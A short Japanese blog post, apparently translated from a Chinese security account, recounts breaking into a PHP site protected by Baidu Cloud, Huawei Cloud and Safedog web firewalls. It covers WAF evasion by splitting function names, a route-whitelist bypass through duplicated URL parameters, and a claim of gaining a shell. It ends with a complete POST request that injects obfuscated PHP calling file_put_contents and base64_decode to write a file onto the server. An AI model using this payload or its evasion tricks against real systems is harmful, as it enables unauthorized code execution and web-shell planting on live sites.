転載が許可されています。興味がある方は、ぜひ公式アカウントをフォローしてください。
昨年、ある集約型スタンドアロンの脆弱性を見つけたが、今年使用する際にブロックされていることに気づいた。愚痴を言わせてもらうと、これは完全に狂っているのか、百度クラウドの waf、華為クラウドの waf、安全犬が一緒になって何をしているのか.....
waf バイパス
比較的簡単で、eval エンコードをフィルタリングすれば良い。
ルーティングホワイトリスト制限バイパス
自由にリクエストを送信すると、ルーティング制限が存在し、指定されたパスのみがアクセス可能であることがわかる。
しかし、すべてのパスが固定されているわけではない。例えば、検索機能はユーザーからの入力を受け取る必要があり、パケットキャプチャを確認すると、検索インターフェースが正常に機能し、ルーティングホワイトリスト制限をトリガーしないことが確認できた。
したがって、パラメータ汚染を利用して制限を回避できると推測される。例えば:
#同名パラメータの挿入
/index.php?name=bob&name=rose
#バックエンドが実際に受け取る可能性がある
name=rose
getshell 後にコードを確認し、このインターフェースが任意の内容にマッチすることを確認した。
最終ペイロード
POST /index.php?c=api&m=essearchlist&s=mmyzj&c=Toup&m=Zj_Post HTTP/2
Host:
Content-Type: application/x-www-form-urlencoded
Content-Length: 147
id='-("fil"."e"._."pu"."t"._."contents")("./kfc2024.php",("base"."64"._."decode")('a2ZjX3ZfbWVfNTA='),FILE_APPEND)-'